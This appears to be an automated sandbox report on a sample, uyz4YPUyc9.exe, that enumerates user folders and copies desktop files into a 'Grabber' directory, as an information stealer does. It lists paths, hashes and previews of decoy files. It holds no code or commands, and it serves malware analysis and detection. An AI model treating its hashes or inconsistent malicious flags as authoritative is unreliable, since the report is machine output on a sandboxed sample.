Preview:	Desktop\...AIXACVYBSB\...FACWLRWHGG\...IVHSHTCODI\....AFWAAFRXKO.png....FACWLRWHGG.pdf....IVHSHTCODI.docx....PSAMNLJHZW.jpg....XQACHMZIHU.xlsx....ZSSZYEFYMU.mp3...QVTVNIBKSD\...UQMPCTZARJ\....IVHSHTCODI.pdf....JDSOXXXWOA.xlsx....MQAWXUYAIK.mp3....TTCBKWZYOC.jpg....UQMPCTZARJ.docx....XQACHMZIHU.png...XZXHAVGRAG\...AFWAAFRXKO.png...desktop.ini...Excel.lnk...FACWLRWHGG.pdf...IVHSHTCODI.pdf...JDSOXXXWOA.docx...JDSOXXXWOA.xlsx...MQAWXUYAIK.mp3...PSAMNLJHZW.jpg...TTCBKWZYOC.jpg...UQMPCTZARJ.docx...uyz4YPUyc9.exe...XQACHMZIHU.png...XQACHMZIHU.xlsx...ZSSZYEFYMU.mp3..

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	690
Entropy (8bit):	5.335468225778955
Encrypted:	false
SSDEEP:	12:UCmByDLDrGnQ0QqV2uJOPLKQ4wRLKTLKBLKMkLKQ5z/SvO/uxNIixWn094kiOLKu:4BMXGn/RJfxrqEEQp/SvO2YixWMeUH5h
MD5:	502D59F2973720DE7C0A19E862A5DDFE
SHA1:	5EDF942C032D9683B46101B05C74C483104EDC49
SHA-256:	EA1316A67DC9941C6A4D049873142F45AE5E10F35EC844A52EB97F40D5FAC782
SHA-512:	6DD3D401E6C075DB6C4BAEF47AF9DF80EBEDC67868507F2F285AF4D2E0A12639B770D0B1DF510ABD115B91D7BC22DE20E950C9CE4F0B27BCEE6E443CD051360E
Malicious:	false
Preview:	Documents\...AIXACVYBSB\...FACWLRWHGG\...IVHSHTCODI\....AFWAAFRXKO.png....FACWLRWHGG.pdf....IVHSHTCODI.docx....PSAMNLJHZW.jpg....XQACHMZIHU.xlsx....ZSSZYEFYMU.mp3...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...QVTVNIBKSD\...UQMPCTZARJ\....IVHSHTCODI.pdf....JDSOXXXWOA.xlsx....MQAWXUYAIK.mp3....TTCBKWZYOC.jpg....UQMPCTZARJ.docx....XQACHMZIHU.png...XZXHAVGRAG\...AFWAAFRXKO.png...desktop.ini...FACWLRWHGG.pdf...IVHSHTCODI.docx...IVHSHTCODI.pdf...JDSOXXXWOA.xlsx...MQAWXUYAIK.mp3...PSAMNLJHZW.jpg...TTCBKWZYOC.jpg...UQMPCTZARJ.docx...XQACHMZIHU.png...XQACHMZIHU.xlsx...ZSSZYEFYMU.mp3..

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	234
Entropy (8bit):	5.252317674594695
Encrypted:	false
SSDEEP:	6:3tLykiL6LKhCWsSc53XxxhuiOxoLHpGQq68cBn:dykiOLKhCrSc53XxxMFWHpGQq68on
MD5:	1C38AA8D02EDC1BC15BBAEDC64C913AE
SHA1:	47D68D5BD5C00053A2E94EE1879E3D3C1CC68D5B
SHA-256:	AAF7730BFADBE0F9A6F349902DE2498907B7174323028FF044A7D3332A964E40
SHA-512:	3D8787CAD0185B29AD0D2537AE4DB5B14F5A087CC749B8BDE2A62FD9B66D62315A79F5A71BFF2A263857AAF743570A3870BC892C8E2AAF762BAB64090B0C9937
Malicious:	false
Preview:	Downloads\...AFWAAFRXKO.png...desktop.ini...FACWLRWHGG.pdf...IVHSHTCODI.docx...IVHSHTCODI.pdf...JDSOXXXWOA.xlsx...MQAWXUYAIK.mp3...PSAMNLJHZW.jpg...TTCBKWZYOC.jpg...UQMPCTZARJ.docx...XQACHMZIHU.png...XQACHMZIHU.xlsx...ZSSZYEFYMU.mp3..

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4188
Entropy (8bit):	5.146305782824014
Encrypted:	false
SSDEEP:	96:4tiCKcwGT+jDM9Zw72fSASbSbdbsuEMnI0kjMC1GA03TlNgehnHrKt4Hsg/uZ9Fx:LYfa2fSASOpgu9nI0kjMC1GA0hOehHrY
MD5:	6E6F2D9CE31116CACDC1C64007598F89
SHA1:	E161F21B8575B304408B1B773ADAA5DBBB3CCA0B
SHA-256:	90C01086714BAA84DDDA896E454FBD42B4F5A1E8EBC2161E1B6138B6285DEBB8
SHA-512:	A73580E6BF9340FA4B34EF36DCFD1DC1AC0AA0FD486AB450D0E1C167E814E67A74810B2EBBF9C7EBE60E499963B9C956132E717843C20D89B420690936A97C5E
Malicious:	false
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-42-624.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-55-956.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696428505298658900_7B05BF2A-C74F-44F8-B674-AA3F9719008B.log.....App1696428527628431800_6CD9E3BB-4D03-46BD-8615-75A902267162.log.....App1696428537364279100_A2018481-B961-46B4-9328-34939DEAF293.log.....App1696428537364768600_A2018481-B961-46B4-9328-34939DEAF293.log...edge_BITS_6440_1090636871\....4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5...edge_BITS_6440_1191663050\....9e51170b-7adf-40ab-83b6-5f97b13bedcb...edge_BITS_6440_1234978473\....1187695d-8276-4e31-8de1-9e57768989bd...edge_BITS_6440_1289371347\....78549187-a875-4f1e-8dfa-9938ebc29c81...edge_BITS_6440_1318414972\....873489b1-33b2-480a-baa2-641b9e09edcd...ed

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AFWAAFRXKO.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\AFWAAFRXKO.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	true
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\IVHSHTCODI.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\PSAMNLJHZW.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPT